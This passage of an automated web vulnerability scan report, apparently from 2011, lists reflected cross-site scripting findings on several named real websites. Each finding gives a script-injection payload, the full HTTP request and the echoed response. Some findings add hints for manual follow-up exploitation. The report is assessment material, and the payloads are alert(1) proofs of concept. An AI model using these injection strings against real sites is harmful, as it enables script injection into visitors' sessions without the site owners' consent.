Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: aaedf1562ad27fe7dbffc58ae5c56f87=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50588

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/On-Deckd5fe3'><script>alert(1)</script>2aec528306' />
...[SNIP]...

3.102. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/On-Deck

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a2be"><script>alert(1)</script>0cc37f18b7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/On-Deck9a2be"><script>alert(1)</script>0cc37f18b7a HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=2190b7470bec9191f7a3b7fb33cc4ced; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2190b7470bec9191f7a3b7fb33cc4ced=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50578

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/On-Deck9a2be"><script>alert(1)</script>0cc37f18b7a" />
...[SNIP]...

3.103. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/On-Deck

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ab27"-alert(1)-"9bc82b719cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/On-Deck7ab27"-alert(1)-"9bc82b719cd HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=70c896269b3f0eef2dff476cbdc7ddf4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 70c896269b3f0eef2dff476cbdc7ddf4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50380

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/On-Deck7ab27"-alert(1)-"9bc82b719cd";

</script>
...[SNIP]...

3.104. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/The-Noob

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3d86'><script>alert(1)</script>b1ffded8566 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/The-Noobb3d86'><script>alert(1)</script>b1ffded8566 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=550a29db4533d9b4bb7330a8ad3d7e8f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 550a29db4533d9b4bb7330a8ad3d7e8f=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50416

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/The-Noobb3d86'><script>alert(1)</script>b1ffded8566' />
...[SNIP]...

3.105. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/The-Noob

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 756bb"-alert(1)-"c84622db6bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/The-Noob756bb"-alert(1)-"c84622db6bd HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=f615d29a7e5ec5d4974871af0bcf1182; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f615d29a7e5ec5d4974871af0bcf1182=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50341

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/The-Noob756bb"-alert(1)-"c84622db6bd";

</script>
...[SNIP]...

3.106. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/The-Noob

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a634"><script>alert(1)</script>ec3897212c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/The-Noob3a634"><script>alert(1)</script>ec3897212c8 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=1cc6f27e893df95ce1bafcfc9a13f70c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1cc6f27e893df95ce1bafcfc9a13f70c=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50414

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/The-Noob3a634"><script>alert(1)</script>ec3897212c8" />
...[SNIP]...

3.107. http://www.butterscotch.com/tutorials.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7c85'><script>alert(1)</script>bc9e9d0f84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tutorials.html?d7c85'><script>alert(1)</script>bc9e9d0f84=1 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=50028f24a02248e8a3ad46b9ac8bedf4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 50028f24a02248e8a3ad46b9ac8bedf4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56587

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/tutorials.html?d7c85'><script>alert(1)</script>bc9e9d0f84=1' />
...[SNIP]...

3.108. http://www.butterscotch.com/tutorials.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c73a3"-alert(1)-"3ae1549e395 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tutorials.html?c73a3"-alert(1)-"3ae1549e395=1 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=5ed14ea161c202f343720ca7427c85a9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 5ed14ea161c202f343720ca7427c85a9=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56385

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'tut';
url = "http://www.butterscotch.com/tutorials.html?c73a3"-alert(1)-"3ae1549e395=1";

</script>
...[SNIP]...

3.109. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 59ab9</title><script>alert(1)</script>4e54375ce26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The response status is 404 Not Found, but the body is a complete HTML search page that the browser renders normally, so the error status does not reduce exploitability.

Request

GET /reviews/59ab9</title><script>alert(1)</script>4e54375ce26/x22 HTTP/1.1
Host: www.buzzillions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 21:49:44 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Sun, 31-Jan-2021 21:49:44 GMT; Path=/
Set-Cookie: lapg=%2Freviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22%3FN%3D0%26D%3Dx%26Ntt%3Dreviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22%26top%3Dyes; Expires=Sun, 31-Jan-2021 21:49:44 GMT; Path=/
Set-Cookie: oref=""; Expires=Sun, 31-Jan-2021 21:49:44 GMT; Path=/
Set-Cookie: bzid=1296769784292; Expires=Sun, 31-Jan-2021 21:49:44 GMT; Path=/
Set-Cookie: JSESSIONID=C184320DF1036E3FFFE2C9F230AFB45D.furyportal; Path=/
Content-Language: en
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 27134

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<title>Buzzillions.com - Search for &#8220;reviews/59ab9</title><script>alert(1)</script>4e54375ce26/x22&#8221;</title>
...[SNIP]...

3.110. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 610a7<script>alert(1)</script>e398f29f414 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reviews/610a7<script>alert(1)</script>e398f29f414/x22 HTTP/1.1
Host: www.buzzillions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 21:49:43 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Sun, 31-Jan-2021 21:49:43 GMT; Path=/
Set-Cookie: lapg=%2Freviews%2F610a7%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee398f29f414%2Fx22%3FN%3D0%26D%3Dx%26Ntt%3Dreviews%2F610a7%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee398f29f414%2Fx22%26top%3Dyes; Expires=Sun, 31-Jan-2021 21:49:43 GMT; Path=/
Set-Cookie: oref=""; Expires=Sun, 31-Jan-2021 21:49:43 GMT; Path=/
Set-Cookie: bzid=1296769783501; Expires=Sun, 31-Jan-2021 21:49:43 GMT; Path=/
Set-Cookie: JSESSIONID=53936D12D95B3B989389E8D7395B2528.snowbird1portal; Path=/
Content-Language: en
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 26907

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<span style="color: #74B74A);" class="bz-emphasize">"reviews/610a7<script>alert(1)</script>e398f29f414/x22"</span>
...[SNIP]...

3.111. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c455e'%3balert(1)//fdc072ec141 was submitted in the REST URL parameter 2. This input was echoed as c455e';alert(1)//fdc072ec141 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/c455e'%3balert(1)//fdc072ec141/x22 HTTP/1.1
Host: www.buzzillions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 21:49:42 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Sun, 31-Jan-2021 21:49:42 GMT; Path=/
Set-Cookie: lapg=%2Freviews%2Fc455e%27%3FN%3D0%26D%3Dx%26Ntt%3Dreviews%2Fc455e%27%3Balert%281%29%2F%2Ffdc072ec141%2Fx22%26top%3Dyes; Expires=Sun, 31-Jan-2021 21:49:42 GMT; Path=/
Set-Cookie: oref=""; Expires=Sun, 31-Jan-2021 21:49:42 GMT; Path=/
Set-Cookie: bzid=1296769782702; Expires=Sun, 31-Jan-2021 21:49:42 GMT; Path=/
Set-Cookie: JSESSIONID=3E5B3D0DD9811F0B99BA32EBCB8EA2F2.visionportal; Path=/
Content-Language: en
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 26564

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<script>bZ.events.handlers.zeroResults('reviews/c455e';alert(1)//fdc072ec141/x22');</script>
...[SNIP]...

3.112. http://www.ip-adress.com/whois/smartdevil.com/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ip-adress.com
Path:   /whois/smartdevil.com/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44a08'%3b28a34fbd60c was submitted in the REST URL parameter 2. This input was echoed as 44a08';28a34fbd60c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Two details in the response narrow that search: the server decoded %3b to ; before echoing, and the single quote reached the page unencoded, so whatever blocked the follow-up payloads was not quote encoding but some later character, keyword or length restriction. The reflected value also sits inside a string literal that is itself building HTML markup (the </' + 'span> concatenation), so both the JavaScript and the resulting HTML are injection surfaces.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /whois/smartdevil.com44a08'%3b28a34fbd60c/x22 HTTP/1.1
Host: www.ip-adress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:56:51 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Set-Cookie: isv=1; expires=Fri, 04-Feb-2011 21:56:51 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13811

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<span id="hostname">smartdevil.com44a08';28a34fbd60c </' + 'span>
...[SNIP]...

3.113. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jobsyndicates.com
Path:   /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4473"%20a%3db%2016a87f4d9f1 was submitted in the REST URL parameter 2. This input was echoed as c4473" a=b 16a87f4d9f1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the reflection point is the content attribute of a meta tag: extra attributes on a meta element do not execute script, so this reflection is only useful if the tag itself can be closed (the "> sequence, which the scanner's follow-up probes did not get through). The same path segment is also reflected into a JavaScript string on this page (3.114), which is the more promising target for manual testing.

Request

GET /find-jobs/All-Locationc4473"%20a%3db%2016a87f4d9f1/warehouse-openings-in-westland-michigan.html/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:59:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=2d455231d6b3a9382ff7357e54908a71; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 21:59:46 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 21:59:46 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25200


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<meta name="description" content="Find warehouse openings in westland michigan.html jobs and career in All Locationc4473" a=b 16a87f4d9f1, displaying 1-15 results. Daily updates Job listing with multiple Rss feed, experience the best way to find a job online" />
...[SNIP]...

3.114. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jobsyndicates.com
Path:   /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e162b"%3b450ee9e1714 was submitted in the REST URL parameter 2. This input was echoed as e162b";450ee9e1714 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /find-jobs/All-Locatione162b"%3b450ee9e1714/warehouse-openings-in-westland-michigan.html/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:59:47 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
